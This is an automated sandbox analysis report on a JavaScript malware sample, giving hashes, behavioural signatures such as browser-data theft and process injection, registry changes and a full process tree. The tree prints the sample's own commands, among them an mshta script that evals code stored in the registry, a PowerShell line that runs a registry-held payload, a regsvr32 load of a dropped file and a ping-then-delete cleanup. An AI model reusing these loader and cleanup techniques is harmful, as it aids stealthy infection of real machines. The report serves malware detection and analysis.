Analysis
-
max time kernel
150s -
max time network
136s -
platform
windows10_x64 -
resource
win10v200430 -
submitted
02-06-2020 10:22
Static task
static1
Behavioral task
behavioral1
Sample
my_attach_p2v.js
Resource
win7v200430
windows7_x64
0 signatures
0 seconds
General
-
Target
my_attach_p2v.js
-
Size
1.3MB
-
MD5
3bfdc69fe78e172ffe8c054d36596163
-
SHA1
ecddf99225e7fb6940270ef115b5c275f48e5f0b
-
SHA256
77ce825e2c50017520147fce8c85173fd63077ef97a07097b53ec61df9048b83
-
SHA512
456162fff6f4c83df925fd2ead41c24001d1ab2982f7a8bc740b7d051e1697899fe24959ebb23569a40fead8e905becdd7786fad28a651cc73baa73f885864ce
Malware Config
Signatures
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious use of WriteProcessMemory 54 IoCs
Processes:
wscript.exeregsvr32.exeiexplore.exemshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.exedescription pid process target process PID 3216 wrote to memory of 1344 3216 wscript.exe regsvr32.exe PID 3216 wrote to memory of 1344 3216 wscript.exe regsvr32.exe PID 1344 wrote to memory of 1516 1344 regsvr32.exe regsvr32.exe PID 1344 wrote to memory of 1516 1344 regsvr32.exe regsvr32.exe PID 1344 wrote to memory of 1516 1344 regsvr32.exe regsvr32.exe PID 3916 wrote to memory of 3832 3916 iexplore.exe IEXPLORE.EXE PID 3916 wrote to memory of 3832 3916 iexplore.exe IEXPLORE.EXE PID 3916 wrote to memory of 3832 3916 iexplore.exe IEXPLORE.EXE PID 3916 wrote to memory of 3300 3916 iexplore.exe IEXPLORE.EXE PID 3916 wrote to memory of 3300 3916 iexplore.exe IEXPLORE.EXE PID 3916 wrote to memory of 3300 3916 iexplore.exe IEXPLORE.EXE PID 1684 wrote to memory of 2952 1684 mshta.exe powershell.exe PID 1684 wrote to memory of 2952 1684 mshta.exe powershell.exe PID 2952 wrote to memory of 1564 2952 powershell.exe csc.exe PID 2952 wrote to memory of 1564 2952 powershell.exe csc.exe PID 1564 wrote to memory of 1236 1564 csc.exe cvtres.exe PID 1564 wrote to memory of 1236 1564 csc.exe cvtres.exe PID 2952 wrote to memory of 2652 2952 powershell.exe csc.exe PID 2952 wrote to memory of 2652 2952 powershell.exe csc.exe PID 2652 wrote to memory of 3680 2652 csc.exe cvtres.exe PID 2652 wrote to memory of 3680 2652 csc.exe cvtres.exe PID 2952 wrote to memory of 2968 2952 powershell.exe Explorer.EXE PID 2952 wrote to memory of 2968 2952 powershell.exe Explorer.EXE PID 2952 wrote to memory of 2968 2952 powershell.exe Explorer.EXE PID 2968 wrote to memory of 3200 2968 Explorer.EXE cmd.exe PID 2968 wrote to memory of 3200 2968 Explorer.EXE cmd.exe PID 2968 wrote to memory of 3200 2968 Explorer.EXE cmd.exe PID 2968 wrote to memory of 3368 2968 Explorer.EXE RuntimeBroker.exe PID 2968 wrote to memory of 3368 2968 Explorer.EXE RuntimeBroker.exe PID 2968 wrote to memory of 3200 2968 Explorer.EXE cmd.exe PID 2968 wrote to memory of 3368 2968 Explorer.EXE RuntimeBroker.exe PID 2968 wrote to memory of 3916 2968 Explorer.EXE iexplore.exe PID 2968 wrote to memory of 3200 2968 Explorer.EXE cmd.exe PID 2968 wrote to memory of 3916 2968 Explorer.EXE iexplore.exe PID 2968 wrote to memory of 3916 2968 Explorer.EXE iexplore.exe PID 3200 wrote to memory of 3552 3200 cmd.exe PING.EXE PID 2968 wrote to memory of 748 2968 Explorer.EXE cmd.exe PID 2968 wrote to memory of 748 2968 Explorer.EXE cmd.exe PID 2968 wrote to memory of 3396 2968 Explorer.EXE cmd.exe PID 2968 wrote to memory of 3396 2968 Explorer.EXE cmd.exe PID 2968 wrote to memory of 3752 2968 Explorer.EXE cmd.exe PID 2968 wrote to memory of 3752 2968 Explorer.EXE cmd.exe PID 2968 wrote to memory of 992 2968 Explorer.EXE cmd.exe PID 2968 wrote to memory of 992 2968 Explorer.EXE cmd.exe PID 2968 wrote to memory of 2344 2968 Explorer.EXE WinMail.exe PID 2968 wrote to memory of 2344 2968 Explorer.EXE WinMail.exe PID 2968 wrote to memory of 2344 2968 Explorer.EXE WinMail.exe PID 2968 wrote to memory of 2344 2968 Explorer.EXE WinMail.exe PID 2968 wrote to memory of 2344 2968 Explorer.EXE WinMail.exe PID 2968 wrote to memory of 2168 2968 Explorer.EXE WinMail.exe PID 2968 wrote to memory of 2168 2968 Explorer.EXE WinMail.exe PID 2968 wrote to memory of 2168 2968 Explorer.EXE WinMail.exe PID 2968 wrote to memory of 2168 2968 Explorer.EXE WinMail.exe PID 2968 wrote to memory of 2168 2968 Explorer.EXE WinMail.exe -
Suspicious behavior: MapViewOfSection 7 IoCs
Processes:
powershell.exeExplorer.EXEcmd.exepid process 2952 powershell.exe 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 3200 cmd.exe 2968 Explorer.EXE 2968 Explorer.EXE -
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
iexplore.exeIEXPLORE.EXEIEXPLORE.EXEpid process 3916 iexplore.exe 3916 iexplore.exe 3832 IEXPLORE.EXE 3832 IEXPLORE.EXE 3916 iexplore.exe 3916 iexplore.exe 3300 IEXPLORE.EXE 3300 IEXPLORE.EXE 3916 iexplore.exe 3916 iexplore.exe 3832 IEXPLORE.EXE 3832 IEXPLORE.EXE -
Suspicious use of FindShellTrayWindow 3 IoCs
Processes:
iexplore.exepid process 3916 iexplore.exe 3916 iexplore.exe 3916 iexplore.exe -
Suspicious use of SetThreadContext 7 IoCs
Processes:
powershell.exeExplorer.EXEcmd.exedescription pid process target process PID 2952 set thread context of 2968 2952 powershell.exe Explorer.EXE PID 2968 set thread context of 3368 2968 Explorer.EXE RuntimeBroker.exe PID 2968 set thread context of 3200 2968 Explorer.EXE cmd.exe PID 2968 set thread context of 3916 2968 Explorer.EXE iexplore.exe PID 3200 set thread context of 3552 3200 cmd.exe PING.EXE PID 2968 set thread context of 2344 2968 Explorer.EXE WinMail.exe PID 2968 set thread context of 2168 2968 Explorer.EXE WinMail.exe -
Loads dropped DLL 2 IoCs
Processes:
regsvr32.exepid process 1516 regsvr32.exe 1516 regsvr32.exe -
Suspicious use of AdjustPrivilegeToken 25 IoCs
Processes:
powershell.exeExplorer.EXEdescription pid process Token: SeDebugPrivilege 2952 powershell.exe Token: SeShutdownPrivilege 2968 Explorer.EXE Token: SeCreatePagefilePrivilege 2968 Explorer.EXE Token: SeShutdownPrivilege 2968 Explorer.EXE Token: SeCreatePagefilePrivilege 2968 Explorer.EXE Token: SeShutdownPrivilege 2968 Explorer.EXE Token: SeCreatePagefilePrivilege 2968 Explorer.EXE Token: SeShutdownPrivilege 2968 Explorer.EXE Token: SeCreatePagefilePrivilege 2968 Explorer.EXE Token: SeShutdownPrivilege 2968 Explorer.EXE Token: SeCreatePagefilePrivilege 2968 Explorer.EXE Token: SeShutdownPrivilege 2968 Explorer.EXE Token: SeCreatePagefilePrivilege 2968 Explorer.EXE Token: SeShutdownPrivilege 2968 Explorer.EXE Token: SeCreatePagefilePrivilege 2968 Explorer.EXE Token: SeShutdownPrivilege 2968 Explorer.EXE Token: SeCreatePagefilePrivilege 2968 Explorer.EXE Token: SeShutdownPrivilege 2968 Explorer.EXE Token: SeCreatePagefilePrivilege 2968 Explorer.EXE Token: SeShutdownPrivilege 2968 Explorer.EXE Token: SeCreatePagefilePrivilege 2968 Explorer.EXE Token: SeShutdownPrivilege 2968 Explorer.EXE Token: SeCreatePagefilePrivilege 2968 Explorer.EXE Token: SeShutdownPrivilege 2968 Explorer.EXE Token: SeCreatePagefilePrivilege 2968 Explorer.EXE -
Processes:
IEXPLORE.EXEiexplore.exeIEXPLORE.EXEdescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30816472" IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30816472" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Internet Explorer\MINIE iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000070f4e65ddf1514459006b313b316c02000000000020000000000106600000001000020000000cc71f8cdd0872b7944b196ea9924976fe448a6e2539421cb8f040af95fcc2eef000000000e8000000002000020000000e6b00c55330a5e2161e16e18685ebdbf4577023923452751e9b4f610dda46f2620000000124b7c56acff7b08c56335f132e83f950e1012139be436153829379a8fd8601e400000005b3bfb02b9388391469915d876e4d73802252e457a0c089bd50dade816d209f71084af5bf89b86440ce562aa74900fd256bde5dcbad6476b5610112aef3cb98f iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{DC1E0B1D-A4CB-11EA-BF1A-4E9FBEDA01F6} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Internet Explorer\VersionManager iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "2980738609" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 105534a5d838d601 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30816472" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff5800000000000000de04000065020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 7073dfa3d838d601 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000070f4e65ddf1514459006b313b316c02000000000020000000000106600000001000020000000915a01c772acf3b2616ebbfb87d262c0a423a4c974653749b4b56c26f7f9511b000000000e8000000002000020000000dbb1fa2f80b01b5149c2f1e5eb6cc3a42620dca57781ef0e34f23179129bb43520000000cf03220ac45915025f42fd75319739e2df67a13eb8b8fa14979dcd167eb7b6a540000000b48f378e2b5ad308eefcaf5511189bc12a9faa1168cda7c5ef53220035e8891c85494f8ffa1cb262689de31d024972dc7951bea9180be6febbadef31348fe9aa iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Internet Explorer\VersionManager IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff3e0000003e000000c4040000a3020000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "2965269851" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "2965269851" iexplore.exe -
Suspicious behavior: EnumeratesProcesses 1560 IoCs
Processes:
powershell.exeExplorer.EXEpid process 2952 powershell.exe 2952 powershell.exe 2952 powershell.exe 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
PING.EXEpid process 3552 PING.EXE -
Checks whether UAC is enabled 3 IoCs
Processes:
IEXPLORE.EXEiexplore.exeIEXPLORE.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA IEXPLORE.EXE Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA iexplore.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA IEXPLORE.EXE
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of WriteProcessMemory
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:2968 -
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\my_attach_p2v.js2⤵
- Suspicious use of WriteProcessMemory
PID:3216 -
C:\Windows\System32\regsvr32.exe"C:\Windows\System32\regsvr32.exe" -s C:\Users\Admin\AppData\Local\Temp\\tmDvhuQzZOS.txt3⤵
- Suspicious use of WriteProcessMemory
PID:1344 -
C:\Windows\SysWOW64\regsvr32.exe-s C:\Users\Admin\AppData\Local\Temp\\tmDvhuQzZOS.txt4⤵
- Loads dropped DLL
PID:1516
-
-
-
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\28FFF86C-67D8-9AFA-31DC-8B6EF5D0EF82\\\AxInrvps'));if(!window.flag)close()</script>"2⤵
- Suspicious use of WriteProcessMemory
PID:1684 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\28FFF86C-67D8-9AFA-31DC-8B6EF5D0EF82").AppCbcd))3⤵
- Suspicious use of WriteProcessMemory
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:2952 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1pgmovxr\1pgmovxr.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:1564 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE45B.tmp" "c:\Users\Admin\AppData\Local\Temp\1pgmovxr\CSC81789A80F20B48059E5D591694EA8650.TMP"5⤵PID:1236
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jk3cauk0\jk3cauk0.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:2652 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE5F1.tmp" "c:\Users\Admin\AppData\Local\Temp\jk3cauk0\CSCC471EB773862424181FBCE5947902EEA.TMP"5⤵PID:3680
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\tmDvhuQzZOS.txt"2⤵
- Suspicious use of WriteProcessMemory
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetThreadContext
PID:3200 -
C:\Windows\system32\PING.EXEping localhost -n 53⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:3552
-
-
-
C:\Windows\system32\cmd.execmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\24A5.bi1"2⤵PID:748
-
C:\Windows\system32\nslookup.exenslookup myip.opendns.com resolver1.opendns.com3⤵PID:3640
-
-
-
C:\Windows\system32\cmd.execmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\2125.bi1"2⤵PID:3396
-
C:\Windows\system32\nslookup.exenslookup myip.opendns.com resolver1.opendns.com3⤵PID:3632
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2125.bi1"2⤵PID:3752
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\24A5.bi1"2⤵PID:992
-
-
C:\Program Files\Windows Mail\WinMail.exe"C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE2⤵PID:2344
-
-
C:\Program Files\Windows Mail\WinMail.exe"C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE2⤵PID:2168
-
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3368
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding1⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of SetWindowsHookEx
- Suspicious use of FindShellTrayWindow
- Modifies Internet Explorer settings
- Checks whether UAC is enabled
PID:3916 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3916 CREDAT:82945 /prefetch:22⤵
- Suspicious use of SetWindowsHookEx
- Modifies Internet Explorer settings
- Checks whether UAC is enabled
PID:3832
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3916 CREDAT:82950 /prefetch:22⤵
- Suspicious use of SetWindowsHookEx
- Modifies Internet Explorer settings
- Checks whether UAC is enabled
PID:3300
-